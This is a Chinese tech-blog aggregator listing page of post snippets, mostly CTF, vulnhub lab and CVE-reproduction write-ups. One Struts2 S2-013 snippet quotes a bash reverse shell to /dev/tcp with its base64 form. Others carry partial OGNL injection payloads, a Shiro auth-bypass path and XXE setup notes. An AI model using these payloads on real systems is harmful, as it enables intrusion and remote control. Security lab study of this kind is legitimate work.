E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
皮卡丘靶场代码审计
[BJDCTF2020]ZJCTF,不过如此--【Preg_Replace代码执行漏洞、正则表达式(详解)】
代码审计
,发现要get传参text和file,而且text的内容包含Ihaveadream字段。flie为文件包含next.php.构造payload:?
野九
·
2024-01-25 10:08
解题
2023-2024年重庆职业院校技能大赛“信息安全管理与评估”比赛样题
第一部分网络安全事件响应任务1应急响应(70分)第二部分数字取证调查任务2操作系统取证(40分)任务3网络数据包分析(50分)任务4计算机单机取证(60分)第三部分应用程序安全任务5恶意程序分析(50分)任务6
代码审计
落寞的魚丶
·
2024-01-25 08:20
网络空间安全(职业技能大赛)
2023-2024职业技能大赛
重庆职业技能大赛
信息安全管理与评估
网络安全
高职组
Vulnhub-dc5
靶场
下载https://download.vulnhub.com/dc/DC-5.zip信息收集#nmap-sn192.168.1.0/24-oNlive.portStartingNmap7.94(https
YAy17
·
2024-01-25 08:38
Vulnhub
网络安全
web安全
安全
安全威胁分析
学习
[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2134)
二、漏洞复现春秋云境.com进入
靶场
开始复现构造payload/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_
free key
·
2024-01-25 06:41
漏洞复现
春秋云境靶场
Struts
apache
struts
web安全
安全
[漏洞复现]Apache POI < 3.10.1 XXE(CVE-2014-3529)
二、漏洞复现春秋云境.com进入
靶场
准备文件和环境创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改###xxe.dtd###">%all;###[Content_Typ
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
web安全
apache
安全
[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)
二、漏洞复现春秋云境.com进入
靶场
开始复现bash-i>&/dev/tcp/127.0.0.1/99990>&1base加密bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOT
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
Struts
apache
struts
java
web安全
安全
[漏洞复现]Apache Shiro < 1.6.0 验证绕过漏洞(CVE-2020-13933)
二、漏洞复现春秋云境.com进入
靶场
开始复现/admin/%3b三、漏洞处置建议把
靶场
关了,跟漏洞说“白白吧”
free key
·
2024-01-25 06:10
春秋云境靶场
漏洞复现
安全
网络
web安全
[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2135)
二、漏洞复现春秋云境.com进入
靶场
开始复现构造好payload,弹nc${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#
free key
·
2024-01-25 06:04
Struts
春秋云境靶场
apache
struts
java
web安全
安全
Easyx-----c语言实现
皮卡丘
移动控制
用贴图方式,实现
皮卡丘
按键盘上键丢球,按右键翻滚效果如下:创建源文件选择.cppvs2019下载Easyx并包含头文件#includeEasyx图形库下载地址www.easyx.cn项目->属性->高级
qiuqiuyaq
·
2024-01-24 22:43
C
/
C++小游戏
c语言
sqlmap使用教程(3)-探测注入漏洞
1、探测GET参数以下为探测DVWA
靶场
low级别的sql注入,以下提交方式为GET,问号(?)将分隔URL和传输的数据,而参数之间以&相连。
fanmeng2008
·
2024-01-24 21:49
安全杂记
web安全
网络安全
小迪安全学习笔记--第38天:web漏洞-反序列化之PHP和JAVA全解(下)
靶场
:webGoathttps://blog.csdn.net/
铁锤2号
·
2024-01-24 16:52
web安全自学笔记
安全
CTF之think_java反序列化完整案例
2020-网鼎杯-朱雀组-Web-think_java详解环境复现CTFHub附件
代码审计
通过打开附件文件中test类文件发现//发现文件路劲@RequestMapping({"/common/test
出顾茅庐
·
2024-01-24 16:49
WEB
CTF
java
安全
38-WEB漏洞-反序列化之PHP&JAVA全解(下)
WEB漏洞-反序列化之PHP&JAVA全解(下)一、Java中API实现二、序列化理解三、案例演示3.1、本地3.2、Java反序列化及命令执行代码测试3.3、WebGoat_Javaweb
靶场
反序列化测试
月亮今天也很亮
·
2024-01-24 16:17
小迪安全
web安全
学习
前端
php
java
burp
靶场
--业务逻辑漏洞
burp
靶场
–业务逻辑漏洞https://portswigger.net/web-security/logic-flaws#what-are-business-logic-vulnerabilities
0rch1d
·
2024-01-24 11:22
burp靶场
WEB安全
渗透测试
网络安全
web安全
burp
靶场
--host攻击
burp
靶场
–host攻击https://portswigger.net/web-security/host-header#what-is-an-http-host-header-attack在本节中,
0rch1d
·
2024-01-24 11:51
burp靶场
WEB安全
渗透测试
web安全
网络安全
burp
靶场
--跨域资源共享(CORS)
burp
靶场
–跨域资源共享(CORS)https://portswigger.net/web-security/cors###跨域资源共享(CORS)在本节中,我们将解释什么是跨域资源共享(CORS),
0rch1d
·
2024-01-24 11:20
burp靶场
WEB安全
渗透测试
web安全
网络安全
pikachu_ssrf攻略
ssrf(curl):打开pikachu
靶场
:http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_curl.php?
爱吃银鱼焖蛋
·
2024-01-24 10:40
渗透测试漏洞
网络安全
ssrf
网络安全
美食测评 | 漳州也有能随身携带的美食你知道吗?
▼新华西路268号乔安新华园11幢店面(桥村星梦幼儿园旁边)10元/人▍胡萝卜▍▍小白▍▍
皮卡丘
▍有事没事就会买一些吃最喜欢的还是以前食物的味道怀念这些美食很久了粿在漳州是一个神奇的食物,本是指用秫米、
一汀食验室
·
2024-01-24 09:36
Web安全漏洞专项
靶场
—SQL注入—docker环境—sqli-labs
靶场
—详细通关指南
SQL注入—sqli-labs
靶场
零、前言一、环境搭建①、VirtualBox②、KaliLinux③、Docker二、闯关开始1、Less-1—'—union2、Less-2—数字型—union3、Less
Dr.Neos
·
2024-01-24 05:01
Web安全漏洞专项靶场
mysql
php
渗透测试
docker
数据库
web安全
网络安全
渗透
靶场
环境准备:VMware 虚拟机安装 & 最小化 CentOS 7 环境安装 & Xshell 安装与基本使用 & Linux 更换 YUM 源
目录前言VMware软件安装安装包的获取软件包的安装最小化CentOS7环境安装CentOS7镜像文件获取CentOS7虚拟机部署虚拟机创建系统安装远程连接工具Xshell7软件包获取软件安装Xshell安装XFTP安装软件使用文件传输CentOS7配置更换YUM镜像源添加epel源小结前言该文章主要是介绍VMware虚拟机安装以及最小化CentOS7(命令行界面)环境安装,以及连接工具Xshel
零号·镜瞳
·
2024-01-24 05:58
渗透测试
靶场搭建
centos
linux
运维
服务器
网络安全
web安全
CTF 三大测试
靶场
搭建:DVWA、SQLi-LABS、upload-labs
靶场
部署教程(VM + CentOS 7 + Docker)
目录前言
靶场
介绍DVWASQLi-LABSupload-labs
靶场
搭建CentOS7虚拟环境准备
靶场
环境部署系统环境配置Docker环境配置下载Docker配置Docker镜像源启动docker
靶场
配置
靶场
镜像抓取创建并运行
零号·镜瞳
·
2024-01-24 05:58
渗透测试
靶场搭建
网络安全
web安全
linux
centos
系统安全
【精选】win7内网穿透&meterpreter后渗透&msf开启摄像头
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub
靶场
复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连
hacker-routing
·
2024-01-23 17:49
【精选】VulnHub
渗透测试靶场练习平台
web
windows
linux系统开发
linux
运维
服务器
网络
网络安全
kali
metersphere
【精选】PHP&java 序列化和反序列化漏洞
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub
靶场
复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连
hacker-routing
·
2024-01-23 17:47
【精选】VulnHub
渗透测试靶场练习平台
windows
linux系统开发
web
php
java
android
linux
服务器
反序列化
CNAS中兴新支点——源
代码审计
怎么做?常用工具有哪些?
源
代码审计
是一种通过检查源代码来发现潜在的安全漏洞的方法。
新支点小星
·
2024-01-23 17:43
安全性测试
单元测试
压力测试
测试覆盖率
模块测试
集成测试
可用性测试
美术课
然后桥的右边有一个蘑菇,我们就开始捏了,同学们捏的非常快,在河里,他们先念了一只小鱼,后来又捏了一只章鱼,在水里活泼一回来又去,然后小鸭子捏捏丁放在水里头,恍恍的水里头,还有一只小乌龟,然后旁边有两只小鸟,就像
皮卡丘
1e3c64fffde6
·
2024-01-23 17:03
使用
靶场
演示SQL注入类型,手法?
判断类型:以sqli-labs第1,2关为例子1.字符型我们进行加减看是否会有变化如果进行逻辑运算则就是数字型否则就是字符型。判断属于字符型2.数字型进行加减法运算判断发现页面更改,判断是数字型。手法:1.联合查询:利用unionselect语句,同时执行两条语句:2.报错注入:在判断过程中,发现数据库中的SQL语句报错,显示在页面中3.布尔盲注:主要对内容进行判断,此时页面正常,数据库名长度是8
爱吃银鱼焖蛋
·
2024-01-23 17:09
网络安全
web安全
渗透测试漏洞
网络安全
sql
代码审计
DVWA_File Upload(impossible)
${target_file}succesfullyuploaded!";}else{//Noecho'Yourimagewasnotuploaded.';}//Deleteanytempfilesif(file_exists($temp_file))unlink($temp_file);}else{//Invalidfile//否则输出:Yourimagewasnotuploaded.Wecano
爱吃银鱼焖蛋
·
2024-01-23 17:38
php
网络安全
php
网络安全
pikachu验证码绕过第三关攻略
打开pikachu
靶场
第三关:挂上代理,随便输入账户密码:返回bp。进行放包发现显示token错误。
爱吃银鱼焖蛋
·
2024-01-23 17:08
网络安全
渗透测试漏洞
网络安全
业务逻辑漏洞—验证码绕过
验证码绕过第一关:前端验证码绕过:打开pikachu
靶场
:输入错误的验证码时会出现弹窗(alert)此时我们猜测这可能存在着前端限制如果验证码有前端限制(只在前端有作用),不影响后端的操作猜测验证码是前端还是后端
爱吃银鱼焖蛋
·
2024-01-23 17:36
网络安全
渗透测试漏洞
网络安全
《大侦探
皮卡丘
》中的父爱
在讲电影之前,先说说自己的小经历,和我对父爱的理解。在高二的时候,我的父亲就因为突发的疾病,去世了。在那之前,一切都有爸爸,感觉再大的困难都不是事儿,再难过的坎都能过去;但是从那之后,我就只有我自己了。其实很长一段时间,我都接受不了我爸爸离开了这样的事实,就觉得好像他还一直都在呢。我也应该是在那个时候,才开始收起棱角,慢慢懂事儿的。所以,我对父爱可能更多的是一种向往和憧憬。前两天跟我朋友一起去看《
土土小吐槽
·
2024-01-23 15:12
xxe漏洞之scms
靶场
漏洞
xxe-scms代码审核(1)全局搜索simplexml_load_stringsimplexml_load_string--将XML字符串解释为对象(2)查看源代码ID=1$GLOBALS['HTTP_RAW_POST_DATA']就相当于file_get_contents("php://input");因此这里就存在xxe漏洞ID=6这里也出现了file_get_contents("php:/
爱喝水的泡泡
·
2024-01-23 15:47
网络安全
csrf漏洞之DedeCMS
靶场
漏洞(超详细)
1.Csrf漏洞:第一步,查找插入点,我选择了网站栏目管理的先秦两汉作为插入点第二步修改栏目名称第三步用burp拦截包第四步生成php脚本代码第五步点击submit第六步提交显示修改成功第二个csrf步骤与上述类似红色边框里面的数字会随着刷新而变化,由此可知存在token因此不能使用csrf注入其他的csrf注入点类似,不一一赘述2.xss漏洞第一个xss漏洞,存在于附件数据管理--->第二个漏洞
爱喝水的泡泡
·
2024-01-23 15:43
csrf
安全
web安全
和平大陆(二)张天成进了特种兵学院
张天成拿黄金m24和金龙m416,在
靶场
每次单兵军事演习都是第一名,不光是单人军事演习,张天成二人、三人、四人军事演习全是第一。(军事演习是三天一次。)
煜卓Jack
·
2024-01-23 15:22
vulnhub通关-1 DC-1(含
靶场
资源)
一、环境搭建1.环境描述描述描述:DC-1isapurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.Dc-1是一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验。Itwasdesignedtobeachallengeforbeginners,butjusthow
Brucye
·
2024-01-23 11:32
vulnhub
网络安全
python
w18认证崩溃之暴力破解4种攻击模式
一、实验环境攻击工具:burpsuite2021.12
靶场
:DVWA二、实验目的演示burpsuite的4种攻击方式三、实验步骤1.搭建
靶场
,将dvwa的网站进行发布,本文采用phpstudy管理网站2
杭城我最帅
·
2024-01-23 10:49
burpsuite
burpsuite
Dvwa
w18认证崩溃之暴力破解DVWA
一、实验环境攻击工具:burpsuite2021.12
靶场
:DVWA二、实验目的演示暴破DVWA的medium和high两个级别,low级别请查看w18认证崩溃之暴力破解4种攻击模式三、实验步骤1.设置
靶场
杭城我最帅
·
2024-01-23 10:49
burpsuite
burpsuite
dvwa
w23
靶场
安装
一、实验环境服务器:phpstudyv8.1.13
靶场
:Bees二、实验目的提供一个
靶场
环境三、实验步骤bees
靶场
安装1.启动小皮的apache和mysql2.在小皮V8.1.1.3版本上创建bees
杭城我最帅
·
2024-01-23 10:46
php
vulhub之Zabbix篇
漏洞环境在vulhub
靶场
进行复现,启动zabbix3.0.3。
咩了个咩咩
·
2024-01-23 06:47
zabbix
关于emlog6.0
代码审计
1、后台标签删除处存在1处sql注入漏洞条件●漏洞url:http://emlog6.0.com/admin/tag.php?action=dell_all_tag●漏洞参数:tag[xx]●是否存在限制:无●是否还有其他条件:action=dell_all_tag,token复现POST/admin/tag.php?action=dell_all_tagHTTP/1.1Host:emlog6.0
黑客大佬
·
2024-01-22 23:47
代码审计
《精灵宝可梦》远不只是回忆或情怀,过去和现在,因为他们的陪伴而改变
如今,80后、90后早已是成年人的一份子,是否能回忆出无印篇第一集,
皮卡丘
被绳子
认同毒趣
·
2024-01-22 19:09
OSCP vulhub LORD OF THE ROOT: 1.0.1
vulhubLORDOFTHEROOT:1.0.1
靶场
信息&安装Description一、信息收集第一种ssh爆破第二种猜二、漏洞探测三、漏洞利用四、提权第二种方法:udf提权第三种缓冲区溢出提权
靶场
信息
GuiltyFet
·
2024-01-22 14:56
OSCP
linux
服务器
ubuntu
LordOfTheRoot_1.0.1靶机学习笔记
补充:vulnhub
靶场
内核提权通过信息收集获得靶机版本:查找ubuntu14*版本的内核漏洞:使用Exploit:searchsploit39166//在kali本地exploit库搜索locatelinux
@阿珂
·
2024-01-22 14:25
靶场
学习
linux
运维
vulnhub
靶场
之 LordOfTheRoot_1.0.1
LordOfTheRoot_1.0.1namp简单使用namp192.168.5.0/24-sP探测目标主机存活情况namp192.168.5.0/24-O识别操作系统namp192.168.5.153-sS-sV-A-T4-p--p-全端口扫描1-65535但是比较耗时间-sSSYN扫描,只完成三次握手前两次,很少有系统记入日志,默认使用,需要root(admin)权限-sV探测端口号版本-A全
wanan0red
·
2024-01-22 14:53
网络
服务器
linux
burp
靶场
--访问控制【越权】
【Burp系列】超全越权漏洞实验总结https://portswigger.net/web-security/access-control/lab-unprotected-admin-functionality1.访问控制【越权】https://portswigger.net/web-security/access-control#what-is-access-control###什么是访问控制:
0rch1d
·
2024-01-22 12:54
WEB安全
burp靶场
渗透测试
web安全
网络安全
burp
靶场
--信息泄露
burp
靶场
–信息泄露https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-error-messages
0rch1d
·
2024-01-22 12:52
burp靶场
WEB安全
渗透测试
网络安全
借助AI进行
代码审计
(下面示例代码来自于一款开源VPN源代码,非客户源代码)最近做
代码审计
,由于代码量较大,对于一些缺陷涉及到较长的代码片段或复杂的代码时,我会借助AI工具进行分析和确认,的确加快了
代码审计
的速度。
manok
·
2024-01-22 11:28
人工智能
供应链安全
代码审计
代码安全
Vulnhub-dc3
靶场
下载https://download.vulnhub.com/dc/DC-3-2.zip信息收集#nmap-sn192.168.1.0/24-oNlive.nmapStartingNmap7.94(
YAy17
·
2024-01-22 11:33
Vulnhub
网络安全
学习
安全威胁分析
web安全
安全
Hack The Box - TIER 0 - Meow Fawn Dancing
实战有点难,
代码审计
有师傅建议先别搞,那刷刷HTB也不错,多方好评。Meow看新手入门连接到HTB的靶机过后,就打开了第一个,好像前面不做也只能打开第一个。
Tajang
·
2024-01-22 08:00
Hack
The
Box
web安全
渗透测试
DC-6靶机做题记录
pwd=oufe提取码:oufe参考:DC6
靶场
介绍:https://www.vulnhub.com/entry/dc-6,315/靶机:http://www.five86.com/downloads/
Fab1an
·
2024-01-22 07:18
CTF
web安全
安全
网络
笔记
网络安全
DC-4靶机刷题记录
pwd=n6nx提取码:n6nx参考:【【基础向】超详解vulnhub
靶场
DC-4-爆破+反弹shell+信息收集】https://www.bilibili.com/video/BV1Le4y1o7Sx
Fab1an
·
2024-01-22 07:48
CTF
笔记
安全
网络安全
web安全
http
上一页
4
5
6
7
8
9
10
11
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他